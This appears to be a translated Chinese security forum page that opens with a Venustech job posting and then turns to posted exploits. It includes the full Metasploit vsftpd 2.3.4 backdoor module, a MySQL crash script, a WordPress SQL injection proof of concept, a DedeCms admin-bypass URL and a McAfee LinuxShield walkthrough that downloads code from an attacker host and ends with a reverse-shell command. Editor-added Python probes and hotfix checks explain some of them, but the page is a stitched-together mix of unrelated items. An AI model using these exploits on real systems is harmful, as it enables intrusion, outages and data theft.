
[Recruitment] [Hiring] 启明星辰 (Venustech) R&D recruitment

  • Position: Other
  • Company: 启明星辰 (Venustech)
  • Location: Beijing
  • Major required: Other
  • Education: Bachelor's degree
  • Experience: 2+ years
  • Salary: Negotiable
  • Age: Not restricted
  • Gender: Not restricted
  • Company website: http://www.venustech.com.cn
  • Résumé e-mail: xiaoyan@sitedirsec.com
  • Phone: 00000000000
  • QQ:
  • Security assistant: recruit or apply through 非安全中国 staff, QQ group: 57116771


  • ++++++++++ Notes on 启明星辰 ++++++++++

    Just send me a private message on the site.

    I. R&D Center: Linux C Software Engineer (several openings)

    Responsibilities:

    1. Software development and maintenance for embedded devices such as security gateways, firewalls and IPS.

    Requirements:

    1. Proficient in C programming.
    2. Proficient with the Linux operating system and with C programming under Linux.
    3. Proficient in TCP/IP and other network protocols; familiar with application-layer protocols and protocol analysis.
    4. Familiar with network security protocols and with security devices such as routers, switches and firewalls.
    5. Familiar with the Linux kernel and kernel development.

    II. R&D Center: Test Engineer (several openings)

    Responsibilities:

    1. System testing and integration testing of products.
    2. Writing, executing and revising product test cases.
    3. Product performance testing.
    4. Support and testing for external projects.

    Requirements:

    1. Basic knowledge of TCP/IP.
    2. Solid grounding in data communications.
    3. Some experience with Linux.
    4. Able to set up and use databases.
    5. Familiar with at least one programming language: C/Perl/VBS/TCL.
    6. Familiar with test case design, system testing and stress testing.
    7. Familiar with firewall principles and with some firewall features.
    8. Some understanding of how network security devices are deployed in networks.
    9. Able to use test tools: LoadRunner, packet analyzers, Spirent or IXIA test equipment.

    III. R&D Center: Security Event Engineer (several openings)

    Responsibilities:

    1. Delivering trojan detection and web vulnerability scanning services.
    2. Technical support for service customers.
    3. Research on web trojans, web vulnerabilities, worms, scanning, denial of service, buffer overflows and the like.
    4. Routine updates and maintenance of the security event databases for IDS/IPS/UTM/TDS/WAG/322 and other products.
    5. Research on attack techniques, the TCP/IP protocol suite and reverse engineering.

     

    非安全中国网 disclaimer: 1. All statements and images in this post are solely the poster's own opinion and are unrelated to this site's position;
    2. This topic was posted by 小妍; the poster 小妍 complies with the six management rules of the "Copyright and Disclaimer Notice" and holds the related rights;
    3. Other organisations or individuals must obtain the consent of the poster 小妍 and of this site before using, reproducing or quoting this post;
    4. Parts of this post are reproduced from other media and published here to spread more information; this does not mean the site endorses their views or vouches for their accuracy;
    5. If this post infringes the copyright of your site or of any individual, please notify this site immediately; it will be removed promptly with our sincerest apologies;
    6. Site administrators and moderators may delete this post without prior notice to the poster.
    VSFTPD v2.3.4 Backdoor command execution vulnerability

    ##
    # $Id: vsftpd_234_backdoor.rb 13099 2011-07-05 05:20:47Z hdm $
    ##

    ##
    # This file is part of the Metasploit Framework and may be subject to
    # redistribution and commercial restrictions. Please see the Metasploit
    # Framework web site for more information on licensing and terms of use.
    # http://metasploit.com/framework/
    ##

    require 'msf/core'

    class Metasploit3 < Msf::Exploit::Remote
      Rank = ExcellentRanking

      include Msf::Exploit::Remote::Tcp

      def initialize(info = {})
        super(update_info(info,
          'Name'           => 'VSFTPD v2.3.4 Backdoor Command Execution',
          'Description'    => %q{
              This module exploits a malicious backdoor that was added to the VSFTPD download
              archive. This backdoor was introduced into the vsftpd-2.3.4.tar.gz archive between
              June 30th 2011 and July 1st 2011 according to the most recent information
              available. This backdoor was removed on July 3rd 2011.
          },
          'Author'         => [ 'hdm', 'mc' ],
          'License'        => MSF_LICENSE,
          'Version'        => '$Revision: 13099 $',
          'References'     =>
            [
              [ 'URL', 'http://pastebin.com/AetT9sS5' ],
              [ 'URL', 'http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html' ]
            ],
          'Privileged'     => true,
          'Platform'       => [ 'unix' ],
          'Arch'           => ARCH_CMD,
          'Payload'        =>
            {
              'Space'       => 2000,
              'BadChars'    => '',
              'DisableNops' => true,
              'Compat'      =>
                {
                  'PayloadType'    => 'cmd_interact',
                  'ConnectionType' => 'find'
                }
            },
          'Targets'        =>
            [
              [ 'Automatic', { } ]
            ],
          'DisclosureDate' => 'Jul 3 2011',
          'DefaultTarget'  => 0))

        register_options([ Opt::RPORT(21) ], self.class)
      end

      def exploit

        # If the bind listener is already up (an earlier trigger), just use it
        nsock = self.connect(false, {'RPORT' => 6200}) rescue nil
        if nsock
          print_status("The port used by the backdoor bind listener is already open")
          handle_backdoor(nsock)
          return
        end

        # Connect to the FTP service port first
        connect

        banner = sock.get_once(-1, 30).to_s
        print_status("Banner: #{banner.strip}")

        # The ":)" in the user name is what the backdoored str_contains_space() looks for
        sock.put("USER #{rand_text_alphanumeric(rand(6)+1)}:)\r\n")
        resp = sock.get_once(-1, 30).to_s
        print_status("USER: #{resp.strip}")

        if resp =~ /^530 /
          print_error("This server is configured for anonymous only and the backdoor code cannot be reached")
          disconnect
          return
        end

        if resp !~ /^331 /
          print_error("This server did not respond as expected: #{resp.strip}")
          disconnect
          return
        end

        sock.put("PASS #{rand_text_alphanumeric(rand(6)+1)}\r\n")

        # Do not bother reading the response from password, just try the backdoor
        nsock = self.connect(false, {'RPORT' => 6200}) rescue nil
        if nsock
          print_good("Backdoor service has been spawned, handling...")
          handle_backdoor(nsock)
          return
        end

        disconnect

      end

      def handle_backdoor(s)

        s.put("id\n")

        r = s.get_once(-1, 5).to_s
        if r !~ /uid=/
          print_error("The service on port 6200 does not appear to be a shell")
          disconnect(s)
          return
        end

        print_good("UID: #{r.strip}")

        s.put("nohup " + payload.encoded + " >/dev/null 2>&1\n")
        handler(s)
      end

    end
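    The exchange the module drives, as an added Python example written by the editor (not part of the original post and not Metasploit code): the probe reads the banner, sends USER with the ":)" trigger, sends PASS without waiting for its reply, and then checks whether something on the backdoor port answers `id` with a uid= line, stopping early on the 530 anonymous-only case exactly as the module does. Because it has to run offline, the block also contains a constructed stand-in for the backdoored daemon (FakeVsftpd234) that opens its "shell" listener on a second socket when it sees the trigger; the OS-assigned ports and the uid line it returns are fixtures of the stand-in, not vsftpd behaviour. Nothing is sent to the shell beyond `id`, so this is a trigger check, not a payload delivery.

```python
import random
import socket
import string
import threading
import time

# The backdoored str_contains_space() in vsftpd 2.3.4 looked for the bytes
# 0x3a 0x29 (":)") in the USER argument and then opened a root shell on TCP 6200.
SMILEY = b":)"


def _rand_name():
    return "".join(random.choices(string.ascii_letters + string.digits, k=random.randint(1, 6)))


def _read_line(sock):
    """Read one LF-terminated line and return it as stripped text ("" on EOF)."""
    buf = b""
    while not buf.endswith(b"\n"):
        chunk = sock.recv(1)
        if not chunk:
            break
        buf += chunk
    return buf.decode("latin-1").strip()


def _shell_answers(host, port, timeout):
    """Connect to the supposed bind shell, send 'id' and look for 'uid=' in the reply."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(b"id\n")
            return b"uid=" in s.recv(1024)
    except OSError:
        return False


def probe_vsftpd_backdoor(host, ftp_port=21, backdoor_port=6200, timeout=5.0):
    """Same decision logic as the module, without a payload. Returns (shell_reachable, detail)."""
    if _shell_answers(host, backdoor_port, timeout):
        return True, "port %d already answers 'id'" % backdoor_port
    with socket.create_connection((host, ftp_port), timeout=timeout) as ftp:
        banner = _read_line(ftp)
        ftp.sendall(b"USER " + _rand_name().encode() + SMILEY + b"\r\n")
        resp = _read_line(ftp)
        if resp.startswith("530 "):
            return False, "anonymous-only server, trigger not reachable: " + resp
        if not resp.startswith("331 "):
            return False, "unexpected reply to USER: " + resp
        # Like the module, do not wait for the PASS reply; the daemon may never send one.
        ftp.sendall(b"PASS " + _rand_name().encode() + b"\r\n")
    for _ in range(10):  # give the daemon a moment to bind the listener
        if _shell_answers(host, backdoor_port, timeout):
            return True, "shell opened on port %d (banner: %s)" % (backdoor_port, banner)
        time.sleep(0.2)
    return False, "no shell on port %d (banner: %s)" % (backdoor_port, banner)


class FakeVsftpd234(threading.Thread):
    """Constructed stand-in for the backdoored daemon so the probe can run offline.

    Handles one login attempt; when the USER line carries the trigger it starts
    listening on its second socket (bound but not listening until then, so earlier
    connects are refused). Ports are OS-assigned, not the real 21/6200."""

    def __init__(self, anonymous_only=False):
        super().__init__(daemon=True)
        self.anonymous_only = anonymous_only
        self.ftp = socket.socket()
        self.ftp.bind(("127.0.0.1", 0))
        self.ftp.listen(1)
        self.shell = socket.socket()
        self.shell.bind(("127.0.0.1", 0))
        self.ftp_port = self.ftp.getsockname()[1]
        self.shell_port = self.shell.getsockname()[1]

    def run(self):
        conn, _ = self.ftp.accept()
        self.ftp.close()
        conn.settimeout(5)
        try:
            conn.sendall(b"220 (vsFTPd 2.3.4)\r\n")
            user = _read_line(conn)
            if self.anonymous_only and not user.upper().startswith("USER ANONYMOUS"):
                conn.sendall(b"530 This FTP server is anonymous only.\r\n")
                return
            if SMILEY.decode() in user:  # the trigger: open the "shell" port
                self.shell.listen(1)
                threading.Thread(target=self._serve_shell, daemon=True).start()
            conn.sendall(b"331 Please specify the password.\r\n")
            _read_line(conn)  # the PASS line
            conn.sendall(b"530 Login incorrect.\r\n")
        except OSError:
            pass
        finally:
            conn.close()

    def _serve_shell(self):
        s, _ = self.shell.accept()
        with s:
            if s.recv(64).strip() == b"id":
                s.sendall(b"uid=0(root) gid=0(root) groups=0(root)\n")  # fixture value


def demo(anonymous_only=False):
    """Run the probe against the stand-in; returns (shell_reachable, detail)."""
    server = FakeVsftpd234(anonymous_only)
    server.start()
    result = probe_vsftpd_backdoor("127.0.0.1", server.ftp_port, server.shell_port, timeout=3.0)
    server.join(5.0)
    return result


if __name__ == "__main__":
    print(demo())
    print(demo(anonymous_only=True))
```

    Against a real host the call is probe_vsftpd_backdoor(host) with the default ports; the retry loop after PASS is there because the real daemon forks before binding port 6200, so an immediate connect can race it.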
    Notice: https://www.sitedirsec.com publishes the latest vulnerabilities; please follow it.


    WordPress Event List Plugin <= 0.7.8 - SQL injection vulnerability
    1. Description:

    SQL injection vulnerability in the Event List plugin 0.7.8 for WordPress
    allows an authenticated user to execute arbitrary SQL commands via the id
    parameter to wp-admin/admin.php.

    2. Proof of Concept:

    http://[wordpress_site]/wp-admin/admin.php?page=el_admin_main&action=edit&id=1 AND SLEEP(10)

    3. Solution:

    The plugin has been removed from WordPress. Deactivate the plug-in and wait
    for a hotfix.

    4. Reference:

    http://dtsa.eu/cve-2017-9429-event-list-version-v-0-7-8-blind-based-sql-injection-sqli/
    http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-9429
    MySQL 5.5.8 remote denial of service vulnerability
    import socket
    import sys

    print("")
    print("----------------------------------------------------------------")
    print("| MySQL 5.5.8 Null Ptr (windows)                                |")
    print("| Level Smash the Stack                                         |")
    print("----------------------------------------------------------------")
    print("")

    # Handshake response packet as posted: 3-byte length (0x26 = 38, the "&"),
    # sequence 1, capability flags, max packet size, charset, 23 reserved
    # bytes, the user name "root" and an empty auth response.
    buf = (b"&\x00\x00\x01\x85\xa2\x03\x00\x00\x00\x00@\x93\x00\x00\x00\x00\x00\x00\x00\x00"
           b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00root\x00\x00")

    # COM_QUERY packet (length 0x11, sequence 0, command 0x03) with the query text as posted
    buf2 = b"\x11\x00\x00\x00\x03set autocommit30"


    def usage():
        print("usage : ./mysql.py <victim_ip>")
        print("example: ./mysql.py 192.168.1.22")


    def main():
        if len(sys.argv) != 2:
            usage()
            sys.exit()
        host = sys.argv[1]
        port = 3306
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((host, port))
        print("\n* Connect")
        # The original sends both packets without reading the server greeting first.
        s.send(buf)
        print("\n* Payload 1 sent")
        s.send(buf2)
        print("\n* Payload 2 sent\n", "\n* Run again to ensure it is down..\n")
        s.close()


    if __name__ == "__main__":
        main()
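    What those two byte strings actually are, as an added example written by the editor in Python (not part of the posted exploit): a decoder for the MySQL packet header (3-byte little-endian length plus a sequence id) and for the protocol-4.1 HandshakeResponse layout, applied to the packets copied from the script above. It shows that the leading "&" is simply 0x26, the 38-byte payload length; that the capability word 0x0003a285 has CLIENT_PROTOCOL_41 and CLIENT_SECURE_CONNECTION set, which is why 23 reserved bytes and a length-prefixed (here empty) auth response follow the flags; and that the second packet is a COM_QUERY whose text is reproduced exactly as posted. The flag names are the standard MySQL client/server capability bits; the builder reproduces the posted packet byte for byte.

```python
import struct

# Capability bits from the MySQL client/server protocol (low 19 bits only).
CLIENT_FLAGS = {
    1 << 0: "CLIENT_LONG_PASSWORD",     1 << 1: "CLIENT_FOUND_ROWS",
    1 << 2: "CLIENT_LONG_FLAG",         1 << 3: "CLIENT_CONNECT_WITH_DB",
    1 << 4: "CLIENT_NO_SCHEMA",         1 << 5: "CLIENT_COMPRESS",
    1 << 6: "CLIENT_ODBC",              1 << 7: "CLIENT_LOCAL_FILES",
    1 << 8: "CLIENT_IGNORE_SPACE",      1 << 9: "CLIENT_PROTOCOL_41",
    1 << 10: "CLIENT_INTERACTIVE",      1 << 11: "CLIENT_SSL",
    1 << 12: "CLIENT_IGNORE_SIGPIPE",   1 << 13: "CLIENT_TRANSACTIONS",
    1 << 14: "CLIENT_RESERVED",         1 << 15: "CLIENT_SECURE_CONNECTION",
    1 << 16: "CLIENT_MULTI_STATEMENTS", 1 << 17: "CLIENT_MULTI_RESULTS",
    1 << 18: "CLIENT_PS_MULTI_RESULTS",
}
COM_QUERY = 0x03

# The two packets from the script above, unchanged.
POST_BUF = (b"&\x00\x00\x01\x85\xa2\x03\x00\x00\x00\x00@\x93\x00\x00\x00\x00\x00\x00\x00\x00"
            b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00root\x00\x00")
POST_BUF2 = b"\x11\x00\x00\x00\x03set autocommit30"


def split_packet(raw):
    """Wire header: 3-byte little-endian payload length, then a 1-byte sequence id."""
    length = int.from_bytes(raw[:3], "little")
    payload = raw[4:4 + length]
    if len(payload) != length:
        raise ValueError("truncated packet: header says %d bytes, got %d" % (length, len(payload)))
    return length, raw[3], payload


def parse_handshake_response(payload):
    """Protocol-4.1 HandshakeResponse: flags, max packet, charset, 23 reserved bytes,
    a NUL-terminated user name, then a length-prefixed auth response."""
    caps, max_packet, charset = struct.unpack_from("<IIB", payload, 0)
    reserved = payload[9:32]
    end = payload.index(b"\x00", 32)
    auth_len = payload[end + 1]
    return {
        "capabilities": caps,
        "flags": [name for bit, name in sorted(CLIENT_FLAGS.items()) if caps & bit],
        "max_packet": max_packet,
        "charset": charset,
        "reserved_zeroed": reserved == b"\x00" * 23,
        "user": payload[32:end].decode("ascii"),
        "auth_response": payload[end + 2:end + 2 + auth_len],
    }


def parse_command(payload):
    """COM_* packet: one command byte followed by its argument (the SQL text for COM_QUERY)."""
    return payload[0], payload[1:]


def build_handshake_response(user, caps=0x0003a285, max_packet=0x40000000, charset=0x93, seq=1):
    """Inverse of parse_handshake_response(); with the defaults it reproduces POST_BUF."""
    payload = (struct.pack("<IIB", caps, max_packet, charset) + b"\x00" * 23
               + user.encode("ascii") + b"\x00" + b"\x00")  # trailing 0: empty auth response
    return len(payload).to_bytes(3, "little") + bytes([seq]) + payload


if __name__ == "__main__":
    length, seq, payload = split_packet(POST_BUF)
    print("packet 1: length=%d seq=%d" % (length, seq), parse_handshake_response(payload))
    cmd, arg = parse_command(split_packet(POST_BUF2)[2])
    print("packet 2: command=0x%02x argument=%r" % (cmd, arg))
```

    Sequence ids matter when reading such traces: the handshake response carries seq 1 because it answers the server greeting (seq 0) that the script never reads, while the query packet starts a fresh command and so goes back to seq 0.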

    Step-by-step guide to installing Linux - setting up the virtual machine

    http://www.sitedir.com.cn/video/4.swf


    织梦 (DedeCms) v5.6-5.7 unauthorized access vulnerability
    http://www.XXXX.com/<dedecms-admin-path>/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root

    Change validate=dcug above to the current captcha value and you can go straight into the site's admin back end.

    The precondition for this vulnerability is that you must know the admin back-end path.

    Official temporary fix:

    Open include/common.inc.php and replace:

        foreach($_REQUEST as $_k=>$_v)
        {
            var_dump($_k);
            if( strlen($_k)>0 && preg_match('#^(cfg_|GLOBALS)#',$_k) )
            {
                exit('Request var not allow!');
            }
        }

    with:

        // Check and register externally submitted variables
        function CheckRequest(&$val) {
            if (is_array($val)) {
                foreach ($val as $_k=>$_v) {
                    CheckRequest($_k);
                    CheckRequest($val[$_k]);
                }
            } else
            {
                if( strlen($val)>0 && preg_match('#^(cfg_|GLOBALS)#',$val) )
                {
                    exit('Request var not allow!');
                }
            }
        }
        CheckRequest($_REQUEST);
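    Why the hotfix has to recurse, as an added example written by the editor in Python (kept in one language with the other added examples on this page; it is not DedeCms code): PHP turns a query-string key such as _POST[GLOBALS][cfg_dbhost] into a nested array, so a loop over the top-level keys of $_REQUEST only ever sees "_POST" and never the GLOBALS or cfg_ names buried underneath it. The block rebuilds that nesting, applies both the original top-level check and the hotfix's recursive CheckRequest logic, and reports which of them stops the payload shape from the post. The host and password values in the constructed sample query are placeholders, not the ones in the post.

```python
import re
from urllib.parse import parse_qsl

# Names DedeCms refuses to register from the request (the hotfix's pattern).
FORBIDDEN = re.compile(r"^(cfg_|GLOBALS)")


def php_parse_query(query):
    """Rebuild the nested array PHP derives from bracketed parameter names.

    'a[b][c]=1' becomes {'a': {'b': {'c': '1'}}}; a later value on the same
    path overwrites the earlier one, which is close enough to PHP here."""
    result = {}
    for raw_key, value in parse_qsl(query, keep_blank_values=True):
        parts = raw_key.replace("]", "").split("[")
        node = result
        for part in parts[:-1]:
            if not isinstance(node.get(part), dict):
                node[part] = {}
            node = node[part]
        node[parts[-1]] = value
    return result


def old_check(request):
    """The loop the post replaces: only top-level keys of $_REQUEST are examined."""
    for key in request:
        if len(key) > 0 and FORBIDDEN.match(key):
            raise ValueError("Request var not allow!")


def new_check(val):
    """The hotfix's CheckRequest(): recurse through keys and values at every depth."""
    if isinstance(val, dict):
        for key, sub in val.items():
            new_check(key)
            new_check(sub)
    elif len(val) > 0 and FORBIDDEN.match(val):
        raise ValueError("Request var not allow!")


def blocked_by(check, query):
    """True if the given check rejects the request built from query."""
    try:
        check(php_parse_query(query))
    except ValueError:
        return True
    return False


# Constructed sample requests: the shape of the post's URL with placeholder values.
ATTACK = ("dopost=login&validate=dcug&userid=admin&pwd=inimda"
          "&_POST[GLOBALS][cfg_dbhost]=db.attacker.example"
          "&_POST[GLOBALS][cfg_dbuser]=root"
          "&_POST[GLOBALS][cfg_dbpwd]=placeholder"
          "&_POST[GLOBALS][cfg_dbname]=root")
BENIGN = "dopost=login&validate=dcug&userid=admin&pwd=placeholder"
FLAT = "cfg_dbhost=db.attacker.example"  # the only shape the old loop could catch


def summary():
    return {
        "old_check blocks nested GLOBALS payload": blocked_by(old_check, ATTACK),
        "new_check blocks nested GLOBALS payload": blocked_by(new_check, ATTACK),
        "old_check blocks top-level cfg_ key": blocked_by(old_check, FLAT),
        "new_check blocks benign login": blocked_by(new_check, BENIGN),
    }


if __name__ == "__main__":
    for line, outcome in summary().items():
        print("%-45s %s" % (line, outcome))
```

    The recursive version also rejects values (not only keys) that start with cfg_ or GLOBALS, which is stricter than strictly necessary but is what the posted hotfix does.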


    Step-by-step guide to installing Linux - setting up the virtual machine tools

    http://www.sitedir.com.cn/video/8.swf

    Multiple security vulnerabilities in the Django development framework
    Published: 2011-09-12

    Affected versions:
    Django 1.2.5
    Django 1.3 beta 1
    Django 1.2.4
    Django 1.2.2
    Django 1.2

    Vulnerability description:

    Django is an open-source web application framework written in Python.
    Django has multiple security vulnerabilities that allow an attacker to obtain sensitive information, manipulate data, carry out cache poisoning attacks or cause a denial of service.
    1) When a cache backend is used, session handling in django.contrib.sessions is flawed and can be exploited to manipulate session data. Successful exploitation requires a known session key and an application that lets the attacker store a dictionary-like object in the cache under a valid session key.
    2) Django's model system includes a field type, URLField, that checks whether a supplied value is a valid URL; if the boolean keyword argument verify_exists is true it also tries to fetch and resolve the supplied URL. By default the underlying socket has no timeout, and an attacker can exploit this by supplying specially crafted URLs that consume all server memory, causing a denial of service.
    3) Handling of redirect responses while validating URLs supplied to a URLField is flawed; an attacker can return a redirect to a "file://" URL and thereby determine whether a local file exists on the server.
    4) Handling of the "X-Forwarded-Host" HTTP header when building the full URL for a redirect response is flawed, which an attacker can exploit for cache poisoning.

    Details:
    https://www.djangoproject.com/weblog/2011/sep/09/security-releases-issued/
    http://secunia.com/advisories/45939/


    McAfee LinuxShield local/remote code execution vulnerability
    McAfee LinuxShield remote/local code
    Affected versions: McAfee LinuxShield <= 1.5.1
    Remote attack: Yes
    Local overflow: Yes
    Background:
    ===========

    LinuxShield detects and removes viruses and other potentially unwanted
    software on Linux-based systems. LinuxShield uses the powerful McAfee
    scanning engine - the engine common to all our anti-virus products.

    Although a few years ago, the Linux operating system was considered a
    secure environment, it is now seeing more occurrences of software
    specifically written to attack or exploit security weaknesses in
    Linux-based systems. Increasingly, Linux-based systems interact with
    Windows-based computers. Although viruses written to attack Windows-
    based systems do not directly attack Linux systems, a Linux server
    can harbor these viruses, ready to infect any client that connects to
    it.

    When installed on your Linux systems, LinuxShield provides protection
    against viruses, Trojan horses, and other types of potentially
    unwanted software.

    LinuxShield scans files as they are opened and closed - a technique
    known as on-access scanning. LinuxShield also incorporates an
    on-demand scanner that enables you to scan any directory or file in
    your host at any time.

    When kept up-to-date with the latest virus-definition (DAT) files,
    LinuxShield is an important part of your network security. We
    recommend that you set up an anti-virus security policy for your
    network, incorporating as many protective measures as possible.

    LinuxShield uses a web-browser interface, and a large number of
    LinuxShield installations can be centrally controlled by ePolicy
    Orchestrator.

    (Product description from LinuxShield Product Guide)


    Description:
    ============

    This vulnerability allows remote attackers to execute arbitrary code
    on vulnerable installations of McAfee LinuxShield. User interaction
    is not required to exploit this vulnerability but an attacker must
    be authenticated.

    The LinuxShield web interface communicates with the locally installed
    "nailsd" daemon, which listens on port 65443/tcp, to make configuration
    changes, query the configuration and execute tasks.

    Each user who can log in to the victim box can also authenticate
    to "nailsd" and can make configuration changes and execute
    tasks with root privileges.

    Direct execution of commands is not possible, but it is possible to
    download and execute code by manipulating the configuration and
    executing scheduled tasks of LinuxShield.


    walk-through (after the TLS handshake):
    +--------------------------------------

    nailsd > +OK welcome to the NAILS Statistics Service
    attacker> auth <user> <pass>
    nailsd > +OK successful authentication

    # Set the attacker repository to download our code from an httpd
    # (catalog.z)
    #---------------------------------------------------------------
    attacker> db set 1 _table=repository status=1 siteList=<?xml version="1.0" encoding="UTF-8"?><ns:SiteLists xmlns:ns="naSiteList" GlobalVersion="20030131003110" LocalVersion="20091209161903" Type="Client"><SiteList Default="1" Name="SomeGUID"><HttpSite Type="repository" Name="EvilRepo" Order="1" Server="<attackerhost>:80" Enabled="1" Local="1"><RelativePath>nai</RelativePath><UseAuth>0</UseAuth><UserName></UserName><Password Encrypted="0"/></HttpSite></SiteList></ns:SiteLists> _cmd=update
    nailsd > +OK database changes buffered.

    # Execute task to set the attacker repository
    #---------------------------------------------------------------
    attacker> task setsitelist
    nailsd > +OK setting sitelist from CMA.

    # Execute the default Update task to download the code
    #---------------------------------------------------------------
    attacker> task nstart LinuxShield Update
    nailsd > +OK task LinuxShield Update starting

    # Create a Scan profile, which executes our code. The profiles are
    # not stored in the database.
    # Scan Profiles: /var/opt/NAI/LinuxShield/etc/ods.cfg
    #---------------------------------------------------------------
    attacker> sconf ODS_99 begin
    nailsd > +OK 1260400888

    # Set the variable "nailsd.profile.ODS_99.scannerPath" to the path
    # where our earlier downloaded catalog.z file is stored.
    # (/opt/McAfee/cma/scratch/update/catalog.z)
    #---------------------------------------------------------------
    attacker> sconf ODS_99 set 1260400888 nailsd.profile.ODS_99.allFiles=true nailsd.profile.ODS_99.childInitTmo=60 nailsd.profile.ODS_99.cleanChildren=2 nailsd.profile.ODS_99.cleansPerChild=10000 nailsd.profile.ODS_5.datPath=/opt/NAI/LinuxShield/engine/dat nailsd.profile.ODS_99.decompArchive=true nailsd.profile.ODS_99.decompExe=true nailsd.profile.ODS_99.engineLibDir=/opt/NAI/LinuxShield/engine/lib nailsd.profile.ODS_99.enginePath=/opt/NAI/LinuxShield/engine/lib/liblnxfv.so nailsd.profile.ODS_99.factoryInitTmo=60 nailsd.profile.ODS_99.heuristicAnalysis=true nailsd.profile.ODS_99.macroAnalysis=true nailsd.profile.ODS_99.maxQueSize=32 nailsd.profile.ODS_99.mime=true nailsd.profile.ODS_99.noJokes=false nailsd.profile.ODS_99.program=true nailsd.profile.ODS_99.quarantineChildren=1 nailsd.profile.ODS_99.quarantineDirectory=/quarantine nailsd.profile.ODS_99.quarantinesPerChild=10000 nailsd.profile.ODS_99.scanChildren=2 nailsd.profile.ODS_99.scanMaxTmo=301 nailsd.profile.ODS_99.scanNWFiles=true nailsd.profile.ODS_99.scanOnRead=true nailsd.profile.ODS_99.scanOnWrite=true nailsd.profile.ODS_99.scannerPath=/opt/McAfee/cma/scratch/update/catalog.z nailsd.profile.ODS_99.scansPerChild=10000 nailsd.profile.ODS_99.slowScanChildren=0 nailsd.profile.ODS_99.filter.0.type=exclude-path nailsd.profile.ODS_99.filter.0.path=/proc nailsd.profile.ODS_99.filter.0.subdir=true nailsd.profile.ODS_99.filter.extensions.mode=all nailsd.profile.ODS_99.filter.extensions.type=extension nailsd.profile.ODS_99.action.Default.primary=Clean nailsd.profile.ODS_99.action.Default.secondary=Quarantine nailsd.profile.ODS_99.action.App.primary=Clean nailsd.profile.ODS_99.action.App.secondary=Quarantine nailsd.profile.ODS_99.action.timeout=Pass nailsd.profile.ODS_99.action.error=Block
    nailsd > +OK configuration changes buffered
    attacker> sconf ODS_99 commit 1260400888
    nailsd > +OK configuration changes stored.

    # Set a scan task with the manipulated profile to execute the code
    #---------------------------------------------------------------
    attacker> db set 1260400888 _table=schedule taskName=Evil Task taskType=On-Demand taskInfo=profileName=ODS_99,paths=path:/root/tmp;exclude:false timetable=type=unscheduled taskResults=0 i_lastRun=1260318482 status=Stopped _cmd=insert
    nailsd > +OK database changes buffered

    # Execute scan task to execute the code
    #---------------------------------------------------------------
    attacker> task nstart Evil Task

    +-------------------------------------- walk-through EOF


    To get a reverse root shell place something like this in the catalog.z

    --- snip ---
    #!/bin/sh
    nc -nv <attacker_host> 4444 -e /bin/sh
    --- /snip ---


    Proof of Concept :
    ==================

    http://inj3ct0r.com/sploits/11165.tar.gz


    Solution:
    =========

    McAfee Advisory
    +--------------
    https://kc.mcafee.com/corporate/index?page=content&id=SB10007


    Disclosure Timeline (YYYY/MM/DD):
    =================================

    2009.12.07: Vulnerability found
    2010.02.03: Asked vendor for a PGP key
    2010.02.05: Vendor sent his PGP key
    2010.02.05: Sent PoC, advisory, disclosure policy and planned disclosure
    date (2010.02.18) to vendor
    2010.02.05: Vendor acknowledges receipt of the advisory
    2010.02.16: Asked for a status update, because the planned release date is
    2010.02.18.
    2010.02.16: Vendor responds that they are currently working on a patch
    2010.02.17: Changed release date to 2010.02.25.
    2010.02.22: Vendor gives a status update that they will be able to release
    the patch on 2010.02.25.
    2010.02.24: Asked for a list of affected products and the advisory URL.
    2010.02.24: Vendor sends the list.
    2010.03.02: Release of this advisory